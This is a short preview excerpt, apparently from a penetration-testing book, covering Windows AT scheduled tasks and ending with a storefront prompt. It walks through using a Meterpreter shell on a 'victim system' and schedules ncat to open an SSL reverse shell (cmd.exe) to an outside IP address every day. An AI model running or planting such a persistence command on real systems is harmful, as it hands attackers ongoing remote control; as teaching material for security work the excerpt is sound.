October 2018
Intermediate to advanced
404 pages
8h 50m
English
Windows since Windows NT 3.14 has had a command-line tool to run scheduled tasks. This tool is called the AT command. This command is very similar to the cron command available on Linux or UNIX. You can set a time, date, and number of times to run any command-line tool or script. So, shell into the system using your Meterpreter connection to the machine:
shell
You're now in the victim system. Type the following command:
AT 5:00PM ncat.exe -nv 128.199.190.69 443 -ssl -e cmd.exe

This sets up a job to run at 5:00 P.M. every day. It will run the ncat.exe executable with the following variables. It is calling to the ...
Read now
Unlock full access